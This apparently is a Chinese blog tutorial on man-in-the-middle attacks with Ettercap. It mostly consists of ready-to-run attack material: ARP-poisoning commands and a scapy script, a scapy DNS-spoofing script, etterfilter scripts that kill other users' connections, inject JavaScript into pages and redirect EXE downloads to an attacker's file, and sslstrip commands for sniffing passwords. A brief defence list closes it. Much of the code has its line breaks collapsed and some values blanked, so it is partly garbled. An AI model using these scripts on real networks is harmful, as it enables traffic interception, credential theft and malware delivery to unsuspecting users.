         Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. ps:摘自Ettercap官网主页,我就不废话了,是款十分NB的神器。。。在最新的SecTools.Org的Top 125 Network Security Tools排行榜中,Ettercap排行第16位。





 0x01 ARP欺骗与DNS欺骗


  ARP欺骗: 在实现TCP/IP协议的网络环境下,一个ip包走到哪里,要怎么走是靠路由表定义,但是,当ip包到达该网络后,哪台机器响应这个ip包却是靠该ip包中所包含的硬件mac地址来识别。也就是说,只有机器的硬件mac地址和该ip包中的硬件mac地址相同的机器才会应答这个ip包,因为在网络中,每一台主机都会有发送ip包的时候,所以,在每台主机的内存中,都有一个 arp--> 硬件mac 的转换表。通常是动态的转换表(该arp表可以手工添加静态条目)。也就是说,该对应表会被主机在一定的时间间隔后刷新。这个时间间隔就是ARP高速缓存的超时时间。通常主机在发送一个ip包之前,它要到该转换表中寻找和ip包对应的硬件mac地址,如果没有找到,该主机就发送一个ARP广播包,于是,主机刷新自己的ARP缓存。然后发出该ip包。在此推荐FB上的一篇文章: 中间人攻击-ARP毒化

  DNS欺骗: 目标将其DNS请求发送到攻击者这里,然后攻击者伪造DNS响应,将正确的IP地址替换为其他IP,之后你就登陆了这个攻击者指定的IP,而攻击者早就在这个IP中安排好了一个伪造的网站如某银行网站,从而骗取用户输入他们想得到的信息,如银行账号及密码等,这可以看作一种网络钓鱼攻击的一种方式。对于个人用户来说,要防范DNS劫持应该注意不点击不明的连接、不去来历不明的网站、不要在小网站进行网上交易,最重要的一点是记清你想去网站的域名,当然,你还可以把你常去的一些涉及到机密信息提交的网站的IP地址记下来,需要时直接输入IP地址登录。在此还推荐FB上的一篇文章: 中间人攻击-DNS欺骗

0x02 中间人攻击



Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]
TARGET is in the format MAC/IP/PORTs (see the man for further detail)
Sniffing and Attack options: -M, --mitm <METHOD:ARGS> perform a mitm attack -o, --only-mitm don't sniff, only perform the mitm attack -b, --broadcast sniff packets destined to broadcast -B, --bridge <IFACE> use bridged sniff (needs 2 ifaces) -p, --nopromisc do not put the iface in promisc mode -S, --nosslmitm do not forge SSL certificates -u, --unoffensive do not forward packets -r, --read <file> read data from pcapfile <file> -f, --pcapfilter <string> set the pcap filter <string> -R, --reversed use reversed TARGET matching -t, --proto <proto> sniff only this proto (default is all) --certificate <file> certificate file to use for SSL MiTM --private-key <file> private key file to use for SSL MiTM
User Interface Type: -T, --text use text only GUI -q, --quiet do not display packet contents -s, --script <CMD> issue these commands to the GUI -C, --curses use curses GUI -D, --daemon daemonize ettercap (no GUI) -G, --gtk use GTK+ GUI
Logging options: -w, --write <file> write sniffed data to pcapfile <file> -L, --log <logfile> log all the traffic to this <logfile> -l, --log-info <logfile> log only passive infos to this <logfile> -m, --log-msg <logfile> log all the messages to this <logfile> -c, --compress use gzip compression on log files
Visualization options: -d, --dns resolves ip addresses into hostnames -V, --visual <format> set the visualization format -e, --regex <regex> visualize only packets matching this regex -E, --ext-headers print extended header for every pck -Q, --superquiet do not display user and password
General options: -i, --iface <iface> use this network interface -I, --liface show all the network interfaces -Y, --secondary <ifaces> list of secondary network interfaces -n, --netmask <netmask> force this <netmask> on iface -A, --address <address> force this local <address> on iface -P, --plugin <plugin> launch this <plugin> -F, --filter <file> load the filter <file> (content filter) -z, --silent do not perform the initial ARP scan -j, --load-hosts <file> load the hosts list from <file> -k, --save-hosts <file> save the hosts list to <file> -W, --wifi-key <wkey> use this key to decrypt wifi packets (wep or wpa) -a, --config <config> use the alterative config file <config>
Standard options: -v, --version prints the version and exit -h, --help


ettercap -i eth0 -T -M arp:remote / // 欺骗局域网内所有主机ettercap -i eth0 -T -M arp:remote / / 欺骗IP为10.0.0.12的主机



tcpdump -i eth0





#!/usr/bin/python# arp-poisoning import sysfrom scapy.all import sniff, sendp, ARP, Ether if len(sys.argv) < 2:    print sys.argv[0] + " <iface>"    sys.exit(0)def arp_poison_callback(packet):    # Got ARP request?    if packet[ARP].op == 1:        answer = Ether(dst=packet[ARP].hwsrc) / ARP()        answer[ARP].op = "is-at"        answer[ARP].hwdst = packet[ARP].hwsrc        answer[ARP].psrc = packet[ARP].pdst        answer[ARP].pdst = packet[ARP].psrc         print "Fooling " + packet[ARP].psrc + " that " +               packet[ARP].pdst + " is me"        sendp(answer, iface=sys.argv[1]) sniff(prn=arp_poison_callback,      filter="arp",      iface=sys.argv[1],      store=0) 
#!/usr/bin/env python# dns-spoofing## A simple DNS spoofing script# It's batter with ARP-Spoofing# and delete the local hosts file# at same time.# The hosts-file like this:# www.google.com# import sysimport getoptimport scapy.all as scapy dev = "eth0"filter = "udp port 53"file = Nonedns_map = {} def handle_packet(packet):    ip = packet.getlayer(scapy.IP)    udp = packet.getlayer(scapy.UDP)    dns = packet.getlayer(scapy.DNS)     # standard (a record) dns query    if dns.qr == 0 and dns.opcode == 0:        queried_host = dns.qd.qname[:-1]        resolved_ip = None         if dns_map.get(queried_host):            resolved_ip = dns_map.get(queried_host)        elif dns_map.get('*'):            resolved_ip = dns_map.get('*')                 if resolved_ip:            dns_answer = scapy.DNSRR(rrname=queried_host + '.',                                     ttl = 330,                                     type="A",                                     rclass="IN",                                     rdata=resolved_ip)            dns_reply = scapy.IP(src=ip.dst, dst=ip.src) /                     scapy.UDP(sport=udp.dport,dport=udp.sport) /                     scapy.DNS(                        id = dns.id,                        qr = 1,                        aa = 0,                        rcode = 0,                        qd = dns.qd,                        an = dns_answer                    )            print "Send %s has %s to %s" % (queried_host,resolved_ip,ip.src)            scapy.send(dns_reply, iface=dev) def usage():    print sys.argv[0] + ' -f <hosts-file>  -i <dev>'    sys.exit(1) def parse_host_file(file):    for line in open(file):        line  = line.rstrip('n')         if line:            (ip, host) = line.split()            dns_map[host] = iptry:    cmd_opts = 'f:i:'    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)except getopt.GetoptError:    usage() for opt in opts:    if opt[0] == '-i':        dev = opt[1]    elif opt[0] == '-f':        file = opt[1]    else:        usage() if file:    parse_host_file(file)else:    usage() print "Spoofing DNS requests on %s" % devscapy.sniff(iface=dev, filter=filter, prn=handle_packet)







  当然,更多使用说明可以查看一下man 手册: man etterfilter.里面对所有的过滤使用的函数都有详细的说明.下面举例:

  (1)  kill掉某一主机:

  当你在心致勃勃地看片的时候,后面几个2b正在猛LOL,搞得看片跟看PPT一样,这个时候你是不是很不爽?是不是想揍他们一顿?好吧.我只想做一个安静的美男子,是时候kill他们了. 使用的过滤脚本为etter.filter.kill,如下:

if (ip.src == '') {      # sent the RST to both source and dest      kill();      # don't even forward the packet      drop();      msg("HaHa! a 2b(ip: has killed...n"); }



  使用ettercap加载此脚本(-q 安静模式,即不显示数据包信息):




  (2) 替换网页的图片:


if (ip.proto == TCP && tcp.dst == 80) {   if (search(DATA.data, "Accept-Encoding")) {      replace("Accept-Encoding", "Accept-Rubbish!");       # note: replacement string is same length as original string      msg("zapped Accept-Encoding!n");   }}if (ip.proto == TCP && tcp.src == 80) {   replace("img src=", "img src="http://www.iyi8.com/uploadfile/2014/0921/20140921113722651.jpg" ");   replace("IMG SRC=", "img src="http://www.iyi8.com/uploadfile/2014/0921/20140921113722651.jpg" ");   msg("Filter Ran.n");}

 (3) JavaSproit注入:

  技术有限,这里就简单的弹个窗吧 :( 使用的脚本是etter.filter.alert:

if (ip.proto == TCP && tcp.dst == 80) {    if (search(DATA.data, "Accept-Encoding")) {           replace("Accept-Encoding", "Accept-Rubbish!");           msg("zapped Accept-Encoding!n");    }}if (ip.proto == TCP && tcp.src == 80) {    if (search(DATA.data, "<body>")) {        replace("<head>","<head><script type="text/javascript">alert('just for a test!');</script>");        replace("<HEAD>","<HEAD><script type="text/javascript">alert('just for a test');</script>");        msg("Filter run!...Exploit code injected ok!n");    }}


15 # replace rmccurdy with your website 16 # replace the url with what ever exe you like 17  18 if (ip.proto == TCP && tcp.dst == 80) { 19    if (search(DATA.data, "Accept-Encoding")) { 20       replace("Accept-Encoding", "Accept-Rubbish!"); 21       # note: replacement string is same length as original string 22       msg("zapped Accept-Encoding!n"); 23    } 24 } 25 if (ip.proto == TCP && tcp.src == 80) { 26    replace("keep-alive", "close" "); 27    replace("Keep-Alive", "close" "); 28 } 29  30 if (ip.proto == TCP && search(DATA.data, ": application") ){ 31    # enable for logging log(DECODED.data, "/tmp/log.log"); 32    msg("found EXEn"); 33    # "Win32" is the first part of the exe example: 34    # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc .. 35    if (search(DATA.data, "Win32")) { 36       msg("doing nothingn"); 37    } else { 38       replace("200 OK", "301 Moved Permanently Location: "); 39       msg("redirect successn"); 40    } 41 }

0x03 SSL密码嗅探


# echo 1 > /proc/sys/net/ipv4/ip_forward# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000# sslstrip -l 10000

0X04 防范MITM攻击的常用方法

1. 将一些机密信息进行加密后再传输,这样即使被“中间人”截取也难以破解。
2. 通过设备或IP异常检测。如用户以前从未使用某个设备或IP访问系统。
3. 通过设备或IP频率检测:如单一的设备或IP同时访问大量的用户帐号。

3. 进行带外认证,具体过程是:系统进行实时的自动电话回叫,将二次PIN码发送至SMS(短信网关),短信网关再转发给用户,用户收到后,再将二次PIN码发送到短信网关,以确认是否是真的用户。


匿名网友 填写信息